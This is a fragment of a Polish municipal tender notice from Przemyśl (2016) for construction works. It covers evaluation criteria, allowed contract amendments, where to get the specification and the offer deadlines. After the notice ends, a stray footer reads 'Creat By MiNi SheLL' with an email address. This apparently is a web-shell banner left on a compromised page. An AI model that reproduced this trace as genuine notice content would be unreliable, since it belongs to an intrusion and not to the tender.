<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Termin realizacji zamówienia - 10</li>
<li>3 - Okres gwarancji na wykonane roboty budowlane, wbudowane materiały (elementy)  i zamontowane urządzenia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, polegające na wprowadzeniu zmian terminu zakończenia realizacji robót, zmianie wynagrodzenia w nw. przypadkach:
1) w przypadku wydłużenia terminu zakończenia prowadzonej procedury przetargowej 
(np. z powodu wniesienia odwołania lub konieczności zabezpieczenia dodatkowych środków finansowych przez Zamawiającego),
2) w przypadku nie uzyskania decyzji administracyjnych, uzgodnień lub opinii niezbędnych do zakończenia prac projektowych stanowiących przedmiot umowy, pomimo złożenia kompletnych wniosków do właściwych organów w terminach przewidzianych 
w odpowiednich przepisach na ich wydanie. W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu umowy, 
3) w przypadku istotnej zmiany przepisów regulujących wykonanie prac stanowiących przedmiot umowy. W takim przypadku zostanie ustalony nowy termin wykonania przedmiotu umowy,
4) w przypadku przedłużającego się terminu na wydanie decyzji pozwolenia na budowę o dodatkowy czas wskazany przez organ wydający pozwolenie, na wyeliminowanie przeszkód nie wynikających z winy Wykonawcy,
5) przesunięcia terminu realizacji ze względu wystąpienia szczególnie niesprzyjających warunków pogodowych uniemożliwiających prowadzenie robót zgodnie z warunkami technicznymi,
6) w razie wystąpienia konieczności wykonania robót zamiennych, bądź konieczności wprowadzenia istotnych zmian do projektu, powodujących zmianę decyzji o pozwoleniu na budowę lub zgłoszeniu, gdy jest to korzystne dla Zamawiającego i nie powoduje zmiany wartości wynagrodzenia lub powoduje obniżenie wartości wynagrodzenia,
7) w przypadku zaniechania przez Zamawiającego wykonania niektórych robót, wynagrodzenie ryczałtowe z § 5 ust. 1 umowy zostanie pomniejszone o wartość ryczałtową danego elementu przedmiotu odbioru, w skład którego wchodzą roboty zaniechane</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przemysl.pl BIP zamówienia publiczne roboty budowlane<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Przemyślu, Rynek 1, 37-700 Przemyśl, Biuro Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2016 godzina 09:00, miejsce: Urząd Miejski w Przemyślu, Rynek 1, 37-700 Przemyśl, Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com